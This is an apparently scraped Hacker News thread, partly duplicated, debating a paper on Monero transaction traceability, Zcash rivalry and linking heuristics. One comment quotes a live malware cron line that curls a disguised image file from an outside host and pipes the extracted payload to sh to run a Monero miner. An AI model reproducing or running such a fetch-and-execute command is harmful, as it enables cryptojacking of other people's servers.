Intellectually and academically dishonest hitpiece by peddlers of a competing cryptocoin.
That this subset of transactions is not safe is not news, nor is it even original research - it was covered in research more than 2 years ago by The Monero Project itself - and is something the project has addressed since and is working to further improve even beyond the recommendations of this paper.
Andrew Miller does not hide his ties to Zcash; I believe none of the other authors are associated with Zcash. I do not think he needs to recuse himself from academic study of competing currencies, just because he has loose ties to Zcash.
Also, the authors do not hide the fact that the vulnerability is not new. Most science is incremental; I haven't seen any evidence of 'academic dishonesty'.
This paper is an empirical analysis. The Monero reports introduced a theoretical attack with conditions, e.g. “a critical loss in untraceability across the whole network if parameters are poorly chosen and if an attacker owns a sufficient percentage of the network.”
The news is that our research confirms, for the first time, that this is actually the case, and it affects actual transactions.
It is not true that this result was previously known. Please see the section “Comparison with related work on Monero linkability.” in the paper (https://monerolink.com), which starts "We note that earlier reports from Monero Research Labs(MRL-0001 [10] and MRL-0004 [7]) have previously discussed concerns about such deduction, called a “chain-reaction,” based on similar insights as described above. However, our results paint a strikingly different picture than these." and then goes on to show those striking differences in the new results and the previous knowledge.
I hope someone actually reads the original Monero Research Lab papers and sees that those papers briefly allude to there being a problem and dismiss it as being a theoretical problem when at the time of the report peoples drugs purchases could and can still be traced. This is an empirical analysis - the first of it's kind with a block explorer, the Monero people should be on their knees thanking the authors of the paper. Instead they are burying their heads in the sand, refusing to admit that they lied when they claimed back in 2015/16 that their currency was untraceable. I'm disgusted to see the flagrant doublethink in the comments here, most people haven't even bothered to read the paper or the MRL reports and are just spouting garbage they've heard via fluffyass.
You couldn't buy drugs with Monero until the end of 2016 when, coincidentally, RingCT was hard-forked in and this paper's entire basis for existence disappeared.
Also two of the Monero Research Lab papers both identify and quantify the problem, and then suggest solutions to it. At no point do the papers dismiss them as theoretical: https://pbs.twimg.com/media/C9nIqDmUQAAqP-R.jpg:large
MRL-0001 is nearly 7000 words, the entirety of which is devoted to showing how dangerous mixin-0 transactions are (ie. the bulk of this 'empirical analysis' paper). MRL-0004 similarly consists of nearly 7000 words, although this time they don't only have an entire section devoted to "traceability with zero mix-in spending", but they cover knock-on effects of banning them ("change and dust force zero mix spending"). They then identify further issues including "temporal associations", "association by use of outputs within a transaction", and "combinatorial attacks to reveal outputs".
The MRL-0004 paper provides a roadmap to defeating some of these by forcing a minimum ring size, but notes that a perfect output selection strategy could not (at the time as now) be determined. They note that "although we have identified this security issue, we are not making formal recommendations yet until we have further data to inform our choices".
Subsequent to that the Monero developers switched to a triangular distribution for selection, and then more recently they added a %-of-outputs-must-be-recent scheme (I can't recall what %). This, combined with the advent of RingCT, has defeated the claims of the research paper. There is no double-think about older transactions, because nobody could use them for anything of note, and it was during a time when 'fluffyass' kept telling people not use buy Monero (which I believe he continues to do).
Amiller, Figure 1 should show that the overwhelming majority of Zcash transactions have the privacy properties of Bitcoin transactions (or worse).
No? It seems kind of imbalanced to have an analysis which emphasizes the security compromises caused by older monero (pre-CT, pre minimum mixin count) while ignoring the ongoing privacy flaw in Zcash usage in practice.
> should show that the overwhelming majority of Zcash transactions have the privacy properties of Bitcoin transactions (or worse).
Agreed, this should updated to specify that only transactions between shielded addresses are protected. The point they are trying to make is that the anonymity set between shielded addresses is that of all transactions in the anonymous set. (FWIW, this is a pre-publication draft.)
> No? It seems kind of imbalanced to have an analysis which emphasizes the security compromises caused by older monero (pre-CT, pre minimum mixin count)
ZCash is pretty explicit about the difference between shielded and transparent addresses....
However, the news here isn't about ZCash. Monero's main claim to fame is that it has an "opaque" blockchain, but this isn't cryptographically ensured. Instead, it relies on each client to create dummy transactions that mirror real ones. That leaves Monero wide open to side channel attacks now and in the future.
One would expect careful analysis and much more cautious language. Instead, it looks like clients weren't even doing basic checks:
> We find that among Monero transaction inputs with one or more mixins, 62% of these are deducible, i.e. they can be incontrovertibly linked to the prior TXO they spend.
It's a solid piece of research and even if Monero fixes everything in this upcoming release, that doesn't make this analysis any less worrying.
Are you talking about the fact that Zcash has, as a feature, the ability to make non-anonymous payments as well? Why would this be of interest to anyone studying the anonymity properties of Monero?
If you execute that command (without | sh part) and save output into .sh script, you'll see that it is running a miner (consuming lots of CPU) for this Monero pool: xmr.crypto-pool.fr:3333
Speaking about criminals using Monero, they've started making ransomware that accepts Monero. As far as I know, they don't for the other supposed-anonymous cryptocurriencies.
There was Bitcoin malware back when CPU mining was feasible. If memory serves me correctly, someone figured out it would be break-even serving ads with JS bitcoin miners.
In my opinion, this is an attempt at smearing a better cryptocurrency competing for the same recognition: true anonymity.
It could very well be the tip of a broader, coming attack. The developers of other cryptocurrencies are spending money for marketing and acceptance into exchanges, Monero is not.
They are willing to grease the wheels to success while Monero grows organically instead. This may or may not be a problem for Monero. If they run a smear-campaign on Monero, they could win with their inferior cryptocurrency.
There is a much better/detailed response to the claims made in the paper on Reddit:
>They are willing to grease the wheels to success while Monero grows organically instead.
I'm curious about this. How is this at all a virtue? If you're not willing to hustle to ensure the success of your project, why should anyone make a bet on it? We've seen many times how the technically superior product loses out against the better positioned competitor. So what makes this different?
Regardless of the veracity of your allegations, this paper is a sound empirical analysis. It's a solid piece of research, and it's not surprising that folks from a competing blockchain would be the first to unveil real problems with Monero.
I mean come on, it's OK to cherrypick xmr's blockchain and post sensationalist and exaggerated tweets, but not Ok to do the same for Zcash...
Their academic integrity has obviously lost it from their financial incentives. Will be very hard to 'trust' these guys again, wouldn't 'trust' the 'trusted setup' that was needed for Zcash for a billion dollars now...
Heuristic I not applicable to RingCT, so moving on...
Heuristic II is basically people sending a transaction to themselves and thus creating 2 new txo's (amount and change). Then at some point people spend both txo's in one transaction. This is something that can be avoided by just not sending coins to yourself and by the wallet giving you a warning when you are about to spend 2 txo's stemming from the same txo.
Heuristic III is basically the fact that the newest txo in a transaction is likely the one that is being spent and can be prevented by people actually keeping a small reserve of XMR and refilling this at random intervals. Don't spend all your XMR all at once just after you received it.
[+] [-] pero|9 years ago|reply
That this subset of transactions is not safe is not news, nor is it even original research - it was covered in research more than 2 years ago by The Monero Project itself - and is something the project has addressed since and is working to further improve even beyond the recommendations of this paper.
Lengthy discussion on reddit here: https://www.reddit.com/r/Monero/comments/65dj7u/an_empirical...
[+] [-] chrispeel|9 years ago|reply
Also, the authors do not hide the fact that the vulnerability is not new. Most science is incremental; I haven't seen any evidence of 'academic dishonesty'.
[+] [-] socrates1024|9 years ago|reply
[+] [-] indolering|9 years ago|reply
[+] [-] zookozcash|9 years ago|reply
[+] [-] kyledrake|9 years ago|reply
[+] [-] whyrusleeping|9 years ago|reply
[+] [-] lumos-sora|9 years ago|reply
[+] [-] plasticmachine|9 years ago|reply
Also two of the Monero Research Lab papers both identify and quantify the problem, and then suggest solutions to it. At no point do the papers dismiss them as theoretical: https://pbs.twimg.com/media/C9nIqDmUQAAqP-R.jpg:large
MRL-0001 is nearly 7000 words, the entirety of which is devoted to showing how dangerous mixin-0 transactions are (ie. the bulk of this 'empirical analysis' paper). MRL-0004 similarly consists of nearly 7000 words, although this time they don't only have an entire section devoted to "traceability with zero mix-in spending", but they cover knock-on effects of banning them ("change and dust force zero mix spending"). They then identify further issues including "temporal associations", "association by use of outputs within a transaction", and "combinatorial attacks to reveal outputs".
The MRL-0004 paper provides a roadmap to defeating some of these by forcing a minimum ring size, but notes that a perfect output selection strategy could not (at the time as now) be determined. They note that "although we have identified this security issue, we are not making formal recommendations yet until we have further data to inform our choices".
Subsequent to that the Monero developers switched to a triangular distribution for selection, and then more recently they added a %-of-outputs-must-be-recent scheme (I can't recall what %). This, combined with the advent of RingCT, has defeated the claims of the research paper. There is no double-think about older transactions, because nobody could use them for anything of note, and it was during a time when 'fluffyass' kept telling people not use buy Monero (which I believe he continues to do).
[+] [-] socrates1024|9 years ago|reply
We found tens of thousands of transactions that included ten or more mixins but could still be traced.
[+] [-] grapevines|9 years ago|reply
[+] [-] nullc|9 years ago|reply
No? It seems kind of imbalanced to have an analysis which emphasizes the security compromises caused by older monero (pre-CT, pre minimum mixin count) while ignoring the ongoing privacy flaw in Zcash usage in practice.
[+] [-] indolering|9 years ago|reply
Agreed, this should updated to specify that only transactions between shielded addresses are protected. The point they are trying to make is that the anonymity set between shielded addresses is that of all transactions in the anonymous set. (FWIW, this is a pre-publication draft.)
> No? It seems kind of imbalanced to have an analysis which emphasizes the security compromises caused by older monero (pre-CT, pre minimum mixin count)
ZCash is pretty explicit about the difference between shielded and transparent addresses....
However, the news here isn't about ZCash. Monero's main claim to fame is that it has an "opaque" blockchain, but this isn't cryptographically ensured. Instead, it relies on each client to create dummy transactions that mirror real ones. That leaves Monero wide open to side channel attacks now and in the future.
One would expect careful analysis and much more cautious language. Instead, it looks like clients weren't even doing basic checks:
> We find that among Monero transaction inputs with one or more mixins, 62% of these are deducible, i.e. they can be incontrovertibly linked to the prior TXO they spend.
It's a solid piece of research and even if Monero fixes everything in this upcoming release, that doesn't make this analysis any less worrying.
[+] [-] woah|9 years ago|reply
[+] [-] kobe26|9 years ago|reply
[deleted]
[+] [-] kovrik|9 years ago|reply
Just today at work we've found malware on some of our servers. That malware added this cron job:
/60 * * * curl http://img1.imagehousing.com/0/art-825604.jpg -k|dd skip=2316 bs=1|sh
If you execute that command (without | sh part) and save output into .sh script, you'll see that it is running a miner (consuming lots of CPU) for this Monero pool: xmr.crypto-pool.fr:3333
See: https://www.sophos.com/en-us/medialibrary/PDFs/technical-pap...
[+] [-] socrates1024|9 years ago|reply
[+] [-] Casseres|9 years ago|reply
[+] [-] elnappo|9 years ago|reply
[+] [-] indolering|9 years ago|reply
[+] [-] nyolfen|9 years ago|reply
[+] [-] Casseres|9 years ago|reply
In my opinion, this is an attempt at smearing a better cryptocurrency competing for the same recognition: true anonymity.
It could very well be the tip of a broader, coming attack. The developers of other cryptocurrencies are spending money for marketing and acceptance into exchanges, Monero is not.
They are willing to grease the wheels to success while Monero grows organically instead. This may or may not be a problem for Monero. If they run a smear-campaign on Monero, they could win with their inferior cryptocurrency.
There is a much better/detailed response to the claims made in the paper on Reddit:
https://www.reddit.com/r/Monero/comments/65pon8/monero_linka...
[+] [-] hackinthebochs|9 years ago|reply
I'm curious about this. How is this at all a virtue? If you're not willing to hustle to ensure the success of your project, why should anyone make a bet on it? We've seen many times how the technically superior product loses out against the better positioned competitor. So what makes this different?
[+] [-] sebleon|9 years ago|reply
[+] [-] Scambuster|9 years ago|reply
I mean come on, it's OK to cherrypick xmr's blockchain and post sensationalist and exaggerated tweets, but not Ok to do the same for Zcash...
Their academic integrity has obviously lost it from their financial incentives. Will be very hard to 'trust' these guys again, wouldn't 'trust' the 'trusted setup' that was needed for Zcash for a billion dollars now...
[+] [-] nubela|9 years ago|reply
[+] [-] sebleon|9 years ago|reply
[+] [-] arisAlexis|9 years ago|reply
Heuristic I not applicable to RingCT, so moving on...
Heuristic II is basically people sending a transaction to themselves and thus creating 2 new txo's (amount and change). Then at some point people spend both txo's in one transaction. This is something that can be avoided by just not sending coins to yourself and by the wallet giving you a warning when you are about to spend 2 txo's stemming from the same txo.
Heuristic III is basically the fact that the newest txo in a transaction is likely the one that is being spent and can be prevented by people actually keeping a small reserve of XMR and refilling this at random intervals. Don't spend all your XMR all at once just after you received it.
[+] [-] placeybordeaux|9 years ago|reply
[+] [-] mirimir|9 years ago|reply
I mean, this is the same document:
https://ipfs4uvgthshqonk.onion.to/ipfs/QmWYTeggKeL8xBitA8uQW...
[+] [-] arisAlexis|9 years ago|reply
[+] [-] Etheryte|9 years ago|reply